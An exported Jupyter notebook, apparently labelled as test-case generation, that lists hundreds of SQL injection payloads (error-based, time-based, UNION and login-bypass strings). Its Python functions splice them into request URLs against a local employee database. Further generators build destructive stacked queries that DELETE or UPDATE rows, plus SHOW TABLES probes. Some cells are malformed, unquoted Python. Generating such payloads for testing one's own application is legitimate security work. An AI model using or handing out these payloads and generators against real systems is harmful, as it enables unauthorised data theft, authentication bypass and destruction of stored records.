plain text inject

In [ ]:
errorbase = [" OR 1=1",
 "OR 1=0",
 "OR x=x",
 "OR x=y",
 "OR 1=1#",
 "OR 1=0#",
 "OR x=x#",
 "OR x=y#",
 "OR 1=1-- ",
 "OR 1=0-- ",
 "OR x=x-- ",
 "OR x=y-- ",
 "OR 3409=3409 AND ('pytW' LIKE 'pytW",
 "OR 3409=3409 AND ('pytW' LIKE 'pytY",
 HAVING 1=1
 HAVING 1=0
 HAVING 1=1#
 HAVING 1=0#
 HAVING 1=1-- 
 HAVING 1=0-- 
 AND 1=1
 AND 1=0
 AND 1=1-- 
 AND 1=0-- 
 AND 1=1#
 AND 1=0#
 AND 1=1 AND '%'='
 AND 1=0 AND '%'='
 AND 1083=1083 AND (1427=1427
 AND 7506=9091 AND (5913=5913
 AND 1083=1083 AND ('1427=1427
 AND 7506=9091 AND ('5913=5913
 AND 7300=7300 AND 'pKlZ'='pKlZ
 AND 7300=7300 AND 'pKlZ'='pKlY
 AND 7300=7300 AND ('pKlZ'='pKlZ
 AND 7300=7300 AND ('pKlZ'='pKlY
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=1--
 AS INJECTX WHERE 1=1 AND 1=0--
 WHERE 1=1 AND 1=1
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=1--
 WHERE 1=1 AND 1=0--
 ORDER BY 1-- 
 ORDER BY 2-- 
 ORDER BY 3-- 
 ORDER BY 4-- 
 ORDER BY 5-- 
 ORDER BY 6-- 
 ORDER BY 7-- 
 ORDER BY 8-- 
 ORDER BY 9-- 
 ORDER BY 10-- 
 ORDER BY 11-- 
 ORDER BY 12-- 
 ORDER BY 13-- 
 ORDER BY 14-- 
 ORDER BY 15-- 
 ORDER BY 16-- 
 ORDER BY 17-- 
 ORDER BY 18-- 
 ORDER BY 19-- 
 ORDER BY 20-- 
 ORDER BY 21-- 
 ORDER BY 22-- 
 ORDER BY 23-- 
 ORDER BY 24-- 
 ORDER BY 25-- 
 ORDER BY 26-- 
 ORDER BY 27-- 
 ORDER BY 28-- 
 ORDER BY 29-- 
 ORDER BY 30-- 
 ORDER BY 31337-- 
 ORDER BY 1# 
 ORDER BY 2# 
 ORDER BY 3# 
 ORDER BY 4# 
 ORDER BY 5# 
 ORDER BY 6# 
 ORDER BY 7# 
 ORDER BY 8# 
 ORDER BY 9# 
 ORDER BY 10# 
 ORDER BY 11# 
 ORDER BY 12# 
 ORDER BY 13# 
 ORDER BY 14# 
 ORDER BY 15# 
 ORDER BY 16# 
 ORDER BY 17# 
 ORDER BY 18# 
 ORDER BY 19# 
 ORDER BY 20# 
 ORDER BY 21# 
 ORDER BY 22# 
 ORDER BY 23# 
 ORDER BY 24# 
 ORDER BY 25# 
 ORDER BY 26# 
 ORDER BY 27# 
 ORDER BY 28# 
 ORDER BY 29# 
 ORDER BY 30#
 ORDER BY 31337#
 ORDER BY 1 
 ORDER BY 2 
 ORDER BY 3 
 ORDER BY 4 
 ORDER BY 5 
 ORDER BY 6 
 ORDER BY 7 
 ORDER BY 8 
 ORDER BY 9 
 ORDER BY 10 
 ORDER BY 11 
 ORDER BY 12 
 ORDER BY 13 
 ORDER BY 14 
 ORDER BY 15 
 ORDER BY 16 
 ORDER BY 17 
 ORDER BY 18 
 ORDER BY 19 
 ORDER BY 20 
 ORDER BY 21 
 ORDER BY 22 
 ORDER BY 23 
 ORDER BY 24 
 ORDER BY 25 
 ORDER BY 26 
 ORDER BY 27 
 ORDER BY 28 
 ORDER BY 29 
 ORDER BY 30 
 ORDER BY 31337 
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
 and (select substring(@@version,1,1))='X'
 and (select substring(@@version,1,1))='M'
 and (select substring(@@version,2,1))='i'
 and (select substring(@@version,2,1))='y'
 and (select substring(@@version,3,1))='c'
 and (select substring(@@version,3,1))='S'
 and (select substring(@@version,3,1))='X'"]

In [ ]:
#Time Based SQL Injection
Time_Based = [
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#

Time_Based ="';waitfor delay '0:0:5'--",
");waitfor delay '0:0:5'--",
"';waitfor delay '0:0:5'--",
"";waitfor delay '0:0:5'--",
"');waitfor delay '0:0:5'--",
"");waitfor delay '0:0:5'--",
"));waitfor delay '0:0:5'--",
"'));waitfor delay '0:0:5'--",
""));waitfor delay '0:0:5'--",
"benchmark(10000000,MD5(1))#",
"1 or benchmark(10000000,MD5(1))#",
"" or benchmark(10000000,MD5(1))#",
"' or benchmark(10000000,MD5(1))#",
"1) or benchmark(10000000,MD5(1))#",
"") or benchmark(10000000,MD5(1))#",
"') or benchmark(10000000,MD5(1))#",
"1)) or benchmark(10000000,MD5(1))#",
"")) or benchmark(10000000,MD5(1))#",
"')) or benchmark(10000000,MD5(1))#",
"pg_sleep(5)--",
"1 or pg_sleep(5)--",
"" or pg_sleep(5)--",
"' or pg_sleep(5)--",
"1) or pg_sleep(5)--",
"") or pg_sleep(5)--",
"') or pg_sleep(5)--",
"1)) or pg_sleep(5)--",
"")) or pg_sleep(5)--",
"')) or pg_sleep(5)--",
"AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe",
"AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#",
"SLEEP(5)#",
"SLEEP(5)--",
"SLEEP(5)="",
"SLEEP(5)='",
"or SLEEP(5)",
"or SLEEP(5)#",
"or SLEEP(5)--",
"or SLEEP(5)="",
"or SLEEP(5)='",
"waitfor delay '00:00:05'",
"waitfor delay '00:00:05'--",
"waitfor delay '00:00:05'#",
"benchmark(50000000,MD5(1))",
"benchmark(50000000,MD5(1))--",
"benchmark(50000000,MD5(1))#",

In [1]:
#Union Select
union_based =[ "ORDER BY SLEEP(5)",
    "ORDER BY 1,SLEEP(5)",
    "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))",
    "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4",
    "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5",
    "ORDER BY SLEEP(5)#",
    "ORDER BY 1,SLEEP(5)#",
    "ORDER BY 1,SLEEP(5),3#",
    "ORDER BY 1,SLEEP(5),3,4#",
    "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#",
    "ORDER BY SLEEP(5)-- ",
    "ORDER BY 1,SLEEP(5)-- ",
    "ORDER BY 1,SLEEP(5),3-- ",
    "ORDER BY 1,SLEEP(5),3,4-- ",
    "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- ",
    "UNION ALL SELECT 1",
    "UNION ALL SELECT 1,2",
    "UNION ALL SELECT 1,2,3",
    "UNION ALL SELECT 1#",
    "UNION ALL SELECT 1,2#",
    "UNION ALL SELECT 1,2,3#",
    "UNION ALL SELECT 1,2,3,4#",
    "UNION ALL SELECT 1-- ",
    "UNION ALL SELECT 1,2-- ",
    "UNION ALL SELECT 1,2,3-- ",
    "UNION ALL SELECT 1,2,3,4-- ",
    "UNION SELECT @@VERSION,SLEEP(5),3",
    "UNION SELECT @@VERSION,SLEEP(5),USER(),4",
    "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
    "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6",
    "UNION SELECT @@VERSION,SLEEP(5),'3",
     "UNION SELECT @@VERSION,SLEEP(5),\"'3'\"#",
  "UNION SELECT @@VERSION,SLEEP(5),USER(),4#",
  "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#",
  "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#",
  "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--",
  "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--"
]

In [ ]:
#bypass
# Bypass = [ "'-'" ,
# "' '",
# "'&'",
# "'^'",
# "'*'",
# ' or ''-'
# ' or '' '
# ' or ''&'
# ' or ''^'
# ' or ''*'
# "-"
# " "
# "&"
# "^"
# "*"
# " or ""-"
# " or "" "
# " or ""&"
# " or ""^"
# " or ""*"
# or true--
# " or true--
# ' or true--
# ") or true--
# ') or true--
# ' or 'x'='x
# ') or ('x')=('x
# ')) or (('x'))=(('x
# " or "x"="x
# ") or ("x")=("x
# ")) or (("x"))=(("x
# or 1=1
# or 1=1--
# or 1=1#
# or 1=1/*
# ' --
# ' #
# '/*
# ' or '1'='1
# ' or '1'='1'--
# ' or '1'='1'#
# ' or '1'='1'/*
# 'or 1=1 or ''='
# ' or 1=1
# ' or 1=1--
# ' or 1=1#
# ' or 1=1/*
# ') or ('1'='1
# ') or ('1'='1'--
# ') or ('1'='1'#
# ') or ('1'='1'/*
# ') or '1'='1
# ') or '1'='1'--
# ') or '1'='1'#
# ') or '1'='1'/*
# 1234 ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
# " --
# " #
# "/*
# " or "1"="1
# " or "1"="1"--
# " or "1"="1"#
# " or "1"="1"/*
# "or 1=1 or ""="
# " or 1=1
# " or 1=1--
# " or 1=1#
# " or 1=1/*
# ") or ("1"="1
# ") or ("1"="1"--
# ") or ("1"="1"#
# ") or ("1"="1"/*
# ") or "1"="1
# ") or "1"="1"--
# ") or "1"="1"#
# ") or "1"="1"/*
# 1234 " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055"
# ]

In [8]:
Bypass = [
    "-",
    " ",
    "&",
    "^",
    "*",
    " or '-'",
    " or ' '",
    " or '&'",
    " or '^'",
    " or '*'",
    '"-"',
    '" "',
    '"&"',
    '"^"',
    '"*"',
    '" or ""-"',
    '" or "" "',
    '" or ""&"',
    '" or ""^"',
    '" or ""*"',
    "or true--",
    '" or true--',
    "' or true--",
    ") or true--",
    "') or true--",
    "' or 'x'='x",
    "') or ('x')=('x",
    "') or (('x'))=(('x",
    '" or "x"="x',
    '") or ("x")=("x',
    '")) or (("x"))=(("x',
    "or 1=1",
    "or 1=1--",
    "or 1=1#",
    "or 1=1/*",
    "' --",
    "' #",
    "'/*",
    "' or '1'='1",
    "' or '1'='1'--",
    "' or '1'='1'#",
    "' or '1'='1'/*",
    "'or 1=1 or ''='",
    "' or 1=1",
    "' or 1=1--",
    "' or 1=1#",
    "' or 1=1/*",
    "') or ('1'='1",
    "') or ('1'='1'--",
    "') or ('1'='1'#",
    "') or ('1'='1'/*",
    "') or '1'='1",
    "') or '1'='1'--",
    "') or '1'='1'#",
    "') or '1'='1'/*",
    "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
    " \" -- ",
    "\" #",
    "\"/*",
    "\" or \"1\"=\"1",
    "\" or \"1\"=\"1\"--",
    "\" or \"1\"=\"1\"#",
    "\" or \"1\"=\"1\"/*",
    "\"or 1=1 or \"\"=\"",
    "\" or 1=1",
    "\" or 1=1--",
    "\" or 1=1#",
    "\" or 1=1/*",
    "\") or (\"1\"=\"1",
    "\") or (\"1\"=\"1\"--",
    "\") or (\"1\"=\"1\"#",
    "\") or (\"1\ " 
    ]

Gen-test-case!

In [7]:
import random

In [13]:
# errorbase -->
# Time_Based[]
# Bypass[]
table_name = ["employee","customer","service","users"]
user = ["asdasd","awwdawd",'lnwza007','eiei123',""]

In band
1.error-based
2.union

In [11]:
errorbase=["OR 1=1",
"OR 1=0",
"OR x=x",
"OR x=y",
"OR 1=1#",
"OR 1=0#",
"OR x=x#",
"OR x=y#",
"OR 1=1-- ",
"OR 1=0-- ",
"OR x=x-- ",
"OR x=y-- ",
"OR 3409=3409 AND ('pytW' LIKE 'pytW",
"OR 3409=3409 AND ('pytW' LIKE 'pytY",
"HAVING 1=1",
"HAVING 1=0",
"HAVING 1=1#",
"HAVING 1=0#",
"HAVING 1=1-- ",
"HAVING 1=0-- ",
"AND 1=1",
"AND 1=0",
"AND 1=1-- ",
"AND 1=0-- ",
"AND 1=1#",
"AND 1=0#",
"AND 1=1 AND '%'='",
"AND 1=0 AND '%'='",
"AND 1083=1083 AND (1427=1427",
"AND 7506=9091 AND (5913=5913",
"AND 1083=1083 AND ('1427=1427",
"AND 7506=9091 AND ('5913=5913",
"AND 7300=7300 AND 'pKlZ'='pKlZ",
"AND 7300=7300 AND 'pKlZ'='pKlY",
"AND 7300=7300 AND ('pKlZ'='pKlZ",
"AND 7300=7300 AND ('pKlZ'='pKlY",
"AS INJECTX WHERE 1=1 AND 1=1",
"AS INJECTX WHERE 1=1 AND 1=0",
"AS INJECTX WHERE 1=1 AND 1=1#",
"AS INJECTX WHERE 1=1 AND 1=0#",
"AS INJECTX WHERE 1=1 AND 1=1--",
"AS INJECTX WHERE 1=1 AND 1=0--",
"WHERE 1=1 AND 1=1",
"WHERE 1=1 AND 1=0",
"WHERE 1=1 AND 1=1#",
"WHERE 1=1 AND 1=0#",
"WHERE 1=1 AND 1=1--",
"WHERE 1=1 AND 1=0--",
"ORDER BY 1-- ",
"ORDER BY 2-- ",
"ORDER BY 3-- ",
"ORDER BY 4-- ",
"ORDER BY 5-- ",
"ORDER BY 6-- ",
"ORDER BY 7-- ",
"ORDER BY 8-- ",
"ORDER BY 9-- ",
"ORDER BY 10-- ",
"ORDER BY 11-- ",
"ORDER BY 12-- ",
"ORDER BY 13-- ",
"ORDER BY 14-- ",
"ORDER BY 15-- ",
"ORDER BY 16-- ",
"ORDER BY 17-- ",
"ORDER BY 18-- ",
"ORDER BY 19-- ",
"ORDER BY 20-- ",
"ORDER BY 21-- ",
"ORDER BY 22-- ",
"ORDER BY 23-- ",
"ORDER BY 24",
"ORDER BY 25",
"ORDER BY 26",
"ORDER BY 27",
"ORDER BY 28",
"ORDER BY 29",
"ORDER BY 30",
"ORDER BY 31337",
"RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--",
"IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--",
"%' AND 8310=8310 AND '%'='",
"%' AND 8310=8311 AND '%'='",
"and (select substring(@@version,1,1))='X'",
"and (select substring(@@version,1,1))='M'",
"and (select substring(@@version,2,1))='i'",
"and (select substring(@@version,2,1))='y'",
"and (select substring(@@version,3,1))='c'",
"and (select substring(@@version,3,1))='S'",
"and (select substring(@@version,3,1))='X'"]
unionbase=[]

In [12]:
random_data(errorbase)

['lnwza007 OR x=y-- ',
 "asdasd AND 7300=7300 AND 'pKlZ'='pKlY",
 'awwdawd WHERE 1=1 AND 1=0--',
 'eiei123 OR x=x-- ',
 "asdasd RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
 "lnwza007 AND 7300=7300 AND 'pKlZ'='pKlZ",
 "awwdawd AND 1=0 AND '%'='",
 ' AND 1=0',
 'eiei123 ORDER BY 10-- ',
 'lnwza007 ORDER BY 14-- ',
 'awwdawd OR x=y',
 'awwdawd ORDER BY 6-- ',
 ' ORDER BY 22-- ',
 "awwdawd and (select substring(@@version,2,1))='y'",
 " and (select substring(@@version,2,1))='y'",
 'asdasd ORDER BY 23-- ',
 " and (select substring(@@version,1,1))='M'",
 'awwdawd OR x=x',
 'asdasd ORDER BY 9-- ',
 'eiei123 OR x=x-- ',
 'lnwza007 AND 1=0#',
 'eiei123 ORDER BY 26',
 "eiei123 AND 1=0 AND '%'='",
 "awwdawd RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
 ' ORDER BY 17-- ',
 'asdasd AND 7506=9091 AND (5913=5913',
 'eiei123 OR 1=0#',
 'lnwza007 ORDER BY 24',
 'eiei123 AS INJECTX WHERE 1=1 AND 1=1--',
 'awwdawd ORDER BY 29']

In [11]:
def random_data(list_data):
    BP_gen=[]
    for i in range(30) :
        BP_gen.append(user[random.randint(0, len(user)-1)]+ " " +
        list_data[random.randint(0, len(list_data)-1)] )
    return BP_gen

URL
(finished)

In [8]:
url= "http://localhost:3000/employee?id="
see_able_col=["employee_id" ,
    "prefixname" ,
    "fname",
    "lname" ,
    "nickname" ,
    "email",
    "tel" ,
    "work_background" ,
    "graduation_certificate" ,
    "address" ,
    "id_card" ,
    "house_registration" ]
unsee_col=["price",
            "name",
            "tel",
            "email",
            "lname",
            "fname",
            "customer_id",
            "username",
            "password"
            ]
see_able_value= [('E001', 'Mr.', 'bobo1', 'two1', 'baba1', 'E001@gmail.com', '0123456781' , 'companyA, companyB', 'XAU', '123 r.xxxxx 50200', '1530302340921', '123 r.xxxxx 54000'), 
       ('E002', 'Mr.', 'bobo2', 'two2', 'baba2', 'E002@gmail.com', '0123456782' , 'companyA, companyB', 'XAU', '123 r.xxxxx 50200', '1530302340922', '123 r.xxxxx 54000'), 
       ('E003', 'Mr.', 'bobo3', 'two3', 'baba3', 'E003@gmail.com', '0123456783' , 'companyA, companyB', 'XAU', '123 r.xxxxx 50200', '1530302340923', '123 r.xxxxx 54000'), 
       ('E004', 'Mr.', 'bobo4', 'two4', 'baba4', 'E004@gmail.com', '0123456784' , 'companyA, companyB', 'XAU', '123 r.xxxxx 50200', '1530302340924', '123 r.xxxxx 54000'), 
       ('E005', 'Mr.', 'bobo5', 'two5', 'baba5', 'E005@gmail.com', '0123456785' , 'companyA, companyB', 'XAU', '123 r.xxxxx 50200', '1530302340925', '123 r.xxxxx 54000')]
unsee_value={"price":['100','200','300','400'],
            "name":['A','B','C','D'],
            "tel":["0123456781", "0123456782"],
            "email":['E001@gmail.com', 'E002@gmail.com'],
            "lname":['memo1', 'memo2'],
            "fname":['one1', 'one2'],
            "customer_id":['C001','C002'],
            "username":['lnwza007','eiei123'],
            "password":['123','123']}

unsee_table =["users","service","customer"]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"]
            }

In [114]:
unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)]
print(unsee_t)
table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)]
print(table_V)
unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)]

print(unsee_v)

service
price
100

In [8]:
def random_urldata(url,table,list_data,value):
    gen=[]
    for i in range(10) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])+" "
        +list_data[random.randint(0, len(list_data)-1)])
    return gen

In [13]:
random_urldata(url,see_able_col,errorbase,see_able_value)

['http://localhost:3000/employee?id=E005 ORDER BY 28',
 'http://localhost:3000/employee?id=E001 ORDER BY 17-- ',
 'http://localhost:3000/employee?id=E005 ORDER BY 26',
 'http://localhost:3000/employee?id=E004 OR 1=1',
 'http://localhost:3000/employee?id=E004 OR 1=1',
 "http://localhost:3000/employee?id=E002 and (select substring(@@version,2,1))='i'",
 "http://localhost:3000/employee?id=E002 OR 3409=3409 AND ('pytW' LIKE 'pytW",
 'http://localhost:3000/employee?id=E004 ORDER BY 16-- ',
 'http://localhost:3000/employee?id=E002 ORDER BY 14-- ',
 'http://localhost:3000/employee?id=E002 ORDER BY 1-- ']

In [8]:
def randomunion_urldata(url,list_data,value):
    gen=[]
    for i in range(20) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])+" "
        +union_based[random.randint(0, len(union_based )-1)])
    return gen

In [9]:
randomunion_urldata(url,union_based ,see_able_value)

NameError: name 'url' is not defined

In [9]:
def randomunionWrealdata_urldata(url,value,table_value,unsee_table,unsee_value):
    gen=[]
    for i in range(20) :
        unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)] #select table
        table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)] # colum
        unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)] # value in that column
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])+" "
        +"UNION SELECT "+ unsee_t + " " + "WHERE " +table_V+ " = "+ unsee_v)
    return gen

In [10]:
randomunionWrealdata_urldata(url,see_able_value,table_value,unsee_table,unsee_value)

['http://localhost:3000/employee?id=E001 UNION SELECT customer WHERE lname = memo2',
 'http://localhost:3000/employee?id=E002 UNION SELECT customer WHERE tel = 0123456782',
 'http://localhost:3000/employee?id=E004 UNION SELECT service WHERE name = B',
 'http://localhost:3000/employee?id=E005 UNION SELECT customer WHERE fname = one2',
 'http://localhost:3000/employee?id=E003 UNION SELECT service WHERE price = 200',
 'http://localhost:3000/employee?id=E002 UNION SELECT customer WHERE fname = one1',
 'http://localhost:3000/employee?id=E004 UNION SELECT customer WHERE fname = one1',
 'http://localhost:3000/employee?id=E005 UNION SELECT service WHERE name = A',
 'http://localhost:3000/employee?id=E004 UNION SELECT service WHERE name = D',
 'http://localhost:3000/employee?id=E002 UNION SELECT users WHERE password = 123',
 'http://localhost:3000/employee?id=E003 UNION SELECT service WHERE name = D',
 'http://localhost:3000/employee?id=E002 UNION SELECT service WHERE price = 200',
 'http://localhost:3000/employee?id=E003 UNION SELECT users WHERE password = 123',
 'http://localhost:3000/employee?id=E004 UNION SELECT users WHERE username = eiei123',
 'http://localhost:3000/employee?id=E003 UNION SELECT service WHERE price = 200',
 'http://localhost:3000/employee?id=E003 UNION SELECT service WHERE name = A',
 'http://localhost:3000/employee?id=E002 UNION SELECT service WHERE price = 300',
 'http://localhost:3000/employee?id=E005 UNION SELECT users WHERE username = lnwza007',
 'http://localhost:3000/employee?id=E005 UNION SELECT service WHERE name = D',
 'http://localhost:3000/employee?id=E005 UNION SELECT service WHERE name = D']

In [80]:
import string
import random

showList = ["DATABASES", "TABLES", "COLUME"]

last = ["#", "# ", "-- "]
table =["users","service","customer", "employee"]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"],
              "employee":["employee_id", "prefixname", "fname", "lname", "nickname", "email", "tel", "work_background", "graduation_certificate", "address", "id_card", "house_registration"]
            }

def generate_random_string(length: int) -> str:
    letters = string.ascii_letters + string.digits
    return ''.join(random.choice(letters) for i in range(length))

In [ ]:
def randomInsert(last):
    gen=[]
    for i in range(10) :

        random_last=last[random.randint(0, len(last)-1)]
        gen.append("'; "+"INSERT "+random_last)
    return gen

In [87]:
def randomUpdate(table, table_value, last):
    gen=[]
    for i in range(10) :
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        gen.append("';" + " UPDATE " + random_table + " SET ")
        numOfParam=random.randint(1, 5)
        for j in range(numOfParam) :
            random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
            random_string=generate_random_string(random.randint(0, 15))
            gen[i] += random_table_value + " = " + random_string
            if j != numOfParam-1 :
                gen[i] += ", "
        random_table_value2=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]        
        random_string2=generate_random_string(random.randint(0, 15))
        gen[i] += " WHERE " + random_table_value2 + " = " + random_string2 +random_last
        
    return gen

In [88]:
randomUpdate(table, table_value, last)

["'; UPDATE service SET name = AgCIAPjHjyNq1d, price = hjMRL33zpa3v, price = kboJSIBlXHy WHERE price = 7XNcdf-- ",
 "'; UPDATE customer SET email = r2o7, fname = kFf, email = xx19PdA WHERE lname = qjvjhNyJjTHr#",
 "'; UPDATE customer SET tel = , fname = yd2IFJFRna29, lname = 8, lname = cljFOjqZaExa8t, customer_id = Rw0e6TEN4iqSRW WHERE fname = MrB#",
 "'; UPDATE service SET name = kuZuaINtvfS, price = n3asX2r5uik, price = e, name = lzcALsXcXyd WHERE name = FugcG9# ",
 "'; UPDATE employee SET employee_id = v2j9cQOvA9hbI, graduation_certificate = BRcE, lname = VvQvBV WHERE graduation_certificate = ZpAqSzky1ZFE-- ",
 "'; UPDATE service SET price = hUbEXldULdY WHERE name = OOd#",
 "'; UPDATE employee SET employee_id = jvE5Juoax0Fog4 WHERE tel = 6# ",
 "'; UPDATE employee SET house_registration = JvZK WHERE house_registration = 8ByQh4n7buPO5#",
 "'; UPDATE customer SET email = LxUsAmtxdWAHD, email = d, tel = rSWCV WHERE customer_id = 3tBSIi71NJ# ",
 "'; UPDATE service SET price = yJBste7QSFx, price = xWocZ, price = KCVGFLJlSjzhcca, name = pmUrNpaFzC WHERE name = Nu5X-- "]

In [37]:
def randomDelete(table, table_value, last):
    gen=[]
    for i in range(10) :
        random_table=table[random.randint(0, len(table)-1)]
        random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        random_last=last[random.randint(0, len(last)-1)]
        random_string=generate_random_string(random.randint(0, 15))
        gen.append("'; "+"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string +random_last)
    return gen

In [38]:
randomDelete(table, table_value, last)

["'; DELETE FROM employee WHERE fname = W1ZDlf#",
 "'; DELETE FROM service WHERE name = v7-- ",
 "'; DELETE FROM employee WHERE id_card = Xfd# ",
 "'; DELETE FROM users WHERE username = -- ",
 "'; DELETE FROM users WHERE username = W# ",
 "'; DELETE FROM customer WHERE tel = 6L#",
 "'; DELETE FROM customer WHERE fname = qXUv40XPkO-- ",
 "'; DELETE FROM users WHERE username = f-- ",
 "'; DELETE FROM users WHERE username = li9v#",
 "'; DELETE FROM service WHERE price = gLUvL#"]

In [16]:
def randomShow(showList, last):
    gen=[]
    for i in range(10) :
        random_show=showList[random.randint(0, len(showList)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        gen.append("'; " + "SHOW " + random_show + random_last)
    return gen

In [17]:
randomShow(showList, last)

['; SHOW TABLES# ',
 '; SHOW DATABASES# ',
 '; SHOW TABLES-- ',
 '; SHOW DATABASES#',
 '; SHOW COLUME-- ',
 '; SHOW DATABASES# ',
 '; SHOW TABLES# ',
 '; SHOW COLUME-- ',
 '; SHOW COLUME# ',
 '; SHOW TABLES-- ']